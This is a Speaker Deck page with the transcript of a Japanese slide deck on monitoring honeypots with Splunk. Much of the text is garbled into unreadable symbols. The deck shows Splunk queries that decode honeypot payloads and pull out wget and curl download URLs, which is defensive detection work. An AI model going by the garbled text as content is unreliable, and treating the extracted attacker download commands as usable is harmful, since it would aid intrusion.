Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Splunkによるハニーポット監視.pdf
Search
sec-chick
September 30, 2018
0
1.5k
Splunkによるハニーポット監視.pdf
sec-chick
September 30, 2018
Tweet
Share
More Decks by sec-chick
See All by sec-chick
不審なURLの見つけ方
secchick
1
470
honeypot
secchick
1
860
SOCって何_公開用_-圧縮済み.pdf
secchick
6
2k
WelComeToHoneyPOTWORLD/ 低対話型ハニーポットを調査してみた
secchick
1
1.8k
Featured
See All Featured
YesSQL, Process and Tooling at Scale
rocio
169
14k
We Have a Design System, Now What?
morganepeng
51
7.3k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
0
98
jQuery: Nuts, Bolts and Bling
dougneiner
61
7.5k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
Reflections from 52 weeks, 52 projects
jeffersonlam
347
20k
RailsConf 2023
tenderlove
29
940
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
A designer walks into a library…
pauljervisheath
204
24k
Making the Leap to Tech Lead
cromwellryan
133
9k
GraphQLとの向き合い方2022年版
quramy
44
13k
Transcript
5 SPLUNK SEC-CHICK
WHO AM I • sec-chick@one_sec_chick (('/+#!/) • )/
,-$ PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap) 0".*/1
Splunk ( ) WoWHoneypot Honeytrap PC VPS
SSH • Splunk
SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html
• WoWHoneypot
• Honeytrap
8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705'
3. Splunk5' )7- 4. 37/ 5. 2"570 .(70 82"570HEX$6(709
Attack_connection.local_port 10
Attack_connection.payload.data_hex Hex →
1. Docker 2. 3.
Splunk 4. Suricata
/.10,-%DOCKER • /.10,-&$ $!"' * ( #) + $*
(Docker+ • $ Docker+→% $
%"-+( • .# Docker %"-+( • %"-+(cron$,* Splunk
WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.# Docker
Splunk WoWHoneypot Honeytrap VPS Honeypot Docker
SPLUNK+;N? • 0 '!0.*Splunk+;N? 1 • @:NB+2EJ9N<IM' DECRYPT
1 • G4MA,+/ - "$F4LNB1@:NB"$ 'D3NKB("& → Grep '!0 *)0 - C=/87J1D3NKB("& → 0 C='#-! 1 - HK562+>5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
WOWHONEYPOT |rex field=_raw "¥"(?<Method_wow>[^¥s]+)¥s(?<wow_path>[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? <base64_wow>.*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)
|eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"
HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[¥w/:¥.¥-]+?)¥s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[¥w/:¥.¥-]+?)¥s" |
HONEYTRAP
SURICATA4 • Grep05%72# 9),#1 # • ;=:><05"68+* 525
/#2# → ./ • Suricata3)#),7 !1$/'-(#??
"!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi
# • @soji256 • @morihi_soc # -,1.)+ !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ ! 2 http://goo.gl/8bLkZA
#
/)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$ +
7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD